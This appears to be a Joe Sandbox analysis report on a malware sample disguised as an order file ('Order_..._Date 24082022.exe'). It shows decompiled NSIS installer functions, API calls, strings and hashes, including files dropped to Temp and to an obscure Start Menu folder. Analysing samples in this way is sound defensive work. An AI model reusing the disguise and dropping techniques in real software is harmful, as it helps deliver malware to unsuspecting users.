String ID: "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" $.DEFAULT\Control Panel\International$.exe$1033$Borerig Setup: Installing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-3269788168
Opcode ID: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
Instruction ID: 64417a43097117c8645ac50bcac1ff1732ece6e83d5d80f238bcb810e00f0866
Opcode Fuzzy Hash: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
Instruction Fuzzy Hash: 8F61B770340604AED620AF65AD45F3B3A6CDB8575AF40453FF991B22E2CB7D9D028E2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402D98 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402D98(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x424730 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\Order_002376662-579588_Date 24082022.exe", 0x400);
				_t105 = E00405C32("C:\\Users\\Arthur\\Desktop\\Order_002376662-579588_Date 24082022.exe", 0x80000000, 3);
				 *0x40a018 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406099("C:\\Users\\Arthur\\Desktop", "C:\\Users\\Arthur\\Desktop\\Order_002376662-579588_Date 24082022.exe");
				E00406099(0x42c000, E00405A78("C:\\Users\\Arthur\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x4178e8 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402CF9(1);
					__eflags =  *0x424738;
					if( *0x424738 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406556(0x40b850);
						E00405C61( &_v300, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004032C5( *0x424738 + 0x1c);
							 *0x4178ec = _t65;
							 *0x4178e0 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E0040303E(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x424734 = _t110;
								 *0x42473c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x424740 =  *0x424740 + 1;
									__eflags =  *0x424740;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x4178dc; // 0x58ea
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405BED(0x424760, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004032C5( *0x4178d8);
					_t77 = E004032AF( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x424738) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004032AF(0x4178f0, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402CF9(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x424738;
						if( *0x424738 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402CF9(0);
							}
							goto L19;
						}
						E00405BED( &_v40, 0x4178f0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x4178d8; // 0x8000
						 *0x4247e0 =  *0x4247e0 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x424738 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x4178e8; // 0x1559
						if(__eflags < 0) {
							_v8 = E004064E8(_v8, 0x4178f0, _t106);
						}
						 *0x4178d8 =  *0x4178d8 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402da6
0x00402da9
0x00402dc3
0x00402dc8
0x00402ddb
0x00402de0
0x00402de6
0x00000000
0x00402de8
0x00402df9
0x00402e0a
0x00402e11
0x00402e17
0x00402e19
0x00402e1e
0x00402e20
0x00402f10
0x00402f12
0x00402f17
0x00402f1e
0x00000000
0x00000000
0x00402f24
0x00402f27
0x00402f53
0x00402f58
0x00402f63
0x00402f65
0x00402f76
0x00402f91
0x00402f97
0x00402f9a
0x00402f9f
0x00402fbe
0x00402fce
0x00402fe0
0x00402fe5
0x00402fea
0x00402fed
0x00402ff6
0x00402ffa
0x00403002
0x00403007
0x00403009
0x00403009
0x00403009
0x00403011
0x00403011
0x00403014
0x00403015
0x00403015
0x00403018
0x0040301a
0x0040301a
0x0040301a
0x0040301d
0x00403024
0x00403030
0x00403035
0x00000000
0x00403035
0x00000000
0x00402fed
0x00000000
0x00402fa1
0x00402f2f
0x00402f3a
0x00402f3f
0x00402f41
0x00000000
0x00000000
0x00402f4a
0x00402f4d
0x00000000
0x00000000
0x00000000
0x00402e26
0x00402e26
0x00402e2b
0x00402e2f
0x00402e36
0x00402e3b
0x00402e3d
0x00402e3f
0x00402e3f
0x00402e47
0x00402e4c
0x00402e4e
0x00402fad
0x00402fef
0x00000000
0x00402fef
0x00402e54
0x00402e5a
0x00402eda
0x00402ede
0x00402ee1
0x00402ee6
0x00000000
0x00402ede
0x00402e67
0x00402e6c
0x00402e6f
0x00402e74
0x00000000
0x00000000
0x00402e76
0x00402e7d
0x00000000
0x00000000
0x00402e7f
0x00402e86
0x00000000
0x00000000
0x00402e88
0x00402e8f
0x00000000
0x00000000
0x00402e91
0x00402e98
0x00000000
0x00000000
0x00402e9a
0x00402ea0
0x00402ea9
0x00402eaf
0x00402eb2
0x00402eb4
0x00402eba
0x00000000
0x00000000
0x00402ec0
0x00402ec4
0x00402ecc
0x00402ecc
0x00402ecf
0x00402ed2
0x00402ed4
0x00402ed6
0x00402ed6
0x00000000
0x00402ed4
0x00402ec6
0x00402eca
0x00000000
0x00000000
0x00000000
0x00402ee7
0x00402ee7
0x00402eed
0x00402efd
0x00402efd
0x00402f00
0x00402f06
0x00402f08
0x00402f08
0x00000000
0x00402e26

APIs

GetTickCount.KERNEL32 ref: 00402DAC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,00000400), ref: 00402DC8

Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,80000000,00000003), ref: 00405C36
Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58

GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,80000000,00000003), ref: 00402E11
GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402F58

Strings

"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" , xrefs: 00402D98
Null, xrefs: 00402E91
soft, xrefs: 00402E88
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FA1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FEF
Inst, xrefs: 00402E7F
C:\Users\user\Desktop, xrefs: 00402DF3, 00402DF8, 00402DFE
C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe, xrefs: 00402DB2, 00402DC1, 00402DD5, 00402DF2
Error launching installer, xrefs: 00402DE8
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DA2, 00402F70

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1545105413
Opcode ID: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
Instruction ID: 415a6227fd12514a0fe47228c9aaee062227cda2d2dbc78d85e3b2e5f7ba07c2
Opcode Fuzzy Hash: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
Instruction Fuzzy Hash: 2561B271A40205ABDB20EF64DE89B9E7AB8EB40358F20413BF514B62D1DB7C99419B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004060BB Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004060BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423efc; // 0x4f060e
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424778;
				_t39 = 0x4236c0;
				_t90 = 0x4236c0;
				if(_a4 >= 0x4236c0 && _a4 - 0x4236c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004060BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E00406099(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E00405FF7(_t90,  *0x424728);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406303(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42472c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247c4;
						if( *0x4247c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424724;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424728,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424728,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405F80((_t80 & 0x0000003f) +  *0x424778, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424778, _t90, _t80 & 0x00000040); // executed
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004060BB(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406099(_a4, _t39);
			}

0x004060bb
0x004060bb
0x004060bb
0x004060c1
0x004060c6
0x004060c8
0x004060d7
0x004060d7
0x004060df
0x004060e0
0x004060e1
0x004060e2
0x004060e5
0x004060ed
0x004060ef
0x00406106
0x00406109
0x00406109
0x004062e0
0x004062e0
0x004062e4
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406123
0x00406126
0x00406129
0x004062d3
0x004062dd
0x004062df
0x004062df
0x004062d5
0x004062d7
0x004062d9
0x004062da
0x004062da
0x00000000
0x004062d3
0x0040612f
0x00406133
0x00406143
0x0040614a
0x0040614d
0x00406155
0x00406158
0x0040615f
0x00406160
0x00406163
0x00406280
0x00406283
0x004062b3
0x004062b6
0x004062bb
0x004062bf
0x004062bf
0x004062c4
0x004062ca
0x004062cc
0x00000000
0x004062cc
0x00406285
0x00406288
0x0040629d
0x004062a4
0x0040628a
0x00406291
0x00406291
0x004062ac
0x004062af
0x00406278
0x00406279
0x00406279
0x00000000
0x004062af
0x00406169
0x00406170
0x00406172
0x00406173
0x0040618d
0x0040618d
0x00406194
0x00406194
0x0040619b
0x0040619f
0x0040619f
0x004061a0
0x004061a2
0x004061db
0x004061de
0x004061ee
0x004061f1
0x004061f9
0x004061ff
0x004061ff
0x0040625e
0x0040625e
0x00406260
0x00000000
0x00000000
0x00406203
0x0040620a
0x0040620b
0x0040620d
0x00406227
0x00406235
0x0040623b
0x0040623d
0x0040625b
0x0040625b
0x0040625b
0x00000000
0x0040625b
0x00406243
0x0040624c
0x0040624f
0x00406255
0x00406259
0x00000000
0x00000000
0x00000000
0x00406259
0x0040620f
0x00406212
0x00000000
0x00000000
0x00406221
0x00406223
0x00406225
0x00000000
0x00000000
0x00000000
0x00406225
0x00000000
0x0040625e
0x004061e6
0x00000000
0x004061a4
0x004061bf
0x004061c4
0x004061c7
0x00406267
0x00406267
0x0040626b
0x00406273
0x00406273
0x00000000
0x0040626b
0x004061d1
0x00406262
0x00406262
0x00406265
0x00000000
0x00000000
0x00000000
0x00406265
0x004061a2
0x00406175
0x00406179
0x00000000
0x00000000
0x0040617b
0x0040617f
0x00000000
0x00000000
0x00406181
0x00406185
0x00000000
0x00406187
0x00406187
0x00000000
0x00406187
0x00406185
0x004062ea
0x004062f4
0x00406300
0x00406300
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004061E6
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,004051F8,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000), ref: 004061F9
SHGetSpecialFolderLocation.SHELL32(004051F8,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,004051F8,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000), ref: 00406235
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406243
CoTaskMemFree.OLE32(00000000), ref: 0040624F
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406273
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,004051F8,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004062C5

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll, xrefs: 004060E0
Software\Microsoft\Windows\CurrentVersion, xrefs: 004061B5
Call, xrefs: 004060E5, 004061B2, 004061B3, 004061B4, 004061D0, 004061E5, 004061F8, 00406214, 0040623F, 00406272, 00406278, 00406290, 004062A3, 004062BE, 004062C4, 004062CC, 004062F6
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040626D

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1309919043
Opcode ID: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
Instruction ID: 009d83548d98726144a2e54fa316bc550aecd198e2c9f4ca7d92c8f0a1cd1b24
Opcode Fuzzy Hash: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
Instruction Fuzzy Hash: 7361F271900105AEDF20AF64C894B7A3BA4EB56710F1241BFE913BA2D1C77C8962CB4E

Uniqueness

Uniqueness Score: -1.00%

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402AC1(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405A9E(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405A31(E00406099(0x40a400, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne\\Tilegnelserne\\Suppegrydernes79")), ??);
				} else {
					_push(0x40a400);
					E00406099();
				}
				E00406303(0x40a400);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040639C(0x40a400);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C0D(0x40a400);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C32(0x40a400, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E004051C0(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247c8;
						goto L32;
					} else {
						E00406099(0x40ac00, 0x425000);
						E00406099(0x425000, 0x40a400);
						E004060BB(_t75, 0x40ac00, 0x40a400, "C:\Users\Arthur\AppData\Local\Temp\nsa7CF6.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406099(0x425000, 0x40ac00);
						_t62 = E004057B5("C:\Users\Arthur\AppData\Local\Temp\nsa7CF6.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247c8 =  &( *0x4247c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a400);
								_push(0xfffffffa);
								E004051C0();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E004051C0(0xffffffea,  *(_t85 - 8)); // executed
				 *0x4247f4 =  *0x4247f4 + 1;
				_t43 = E0040303E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x4247f4 =  *0x4247f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004060BB(_t75, _t80, 0x40a400, 0x40a400, 0xffffffee);
					} else {
						E004060BB(_t75, _t80, 0x40a400, 0x40a400, 0xffffffe9);
						lstrcatA(0x40a400,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a400);
					E004057B5();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x0040177c
0x00401798
0x0040177e
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x00402716
0x00402716
0x00402951
0x00402954
0x00402954
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x0040295a
0x0040295a
0x0040295a
0x00401858
0x00401858
0x00401859
0x00401492
0x004022e1
0x004022e1
0x004022e1
0x00401856
0x0040184f
0x0040295c
0x00402960
0x00402960
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x004022dc
0x00000000
0x004022dc
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79,00000000,00000000,00000031), ref: 00401798
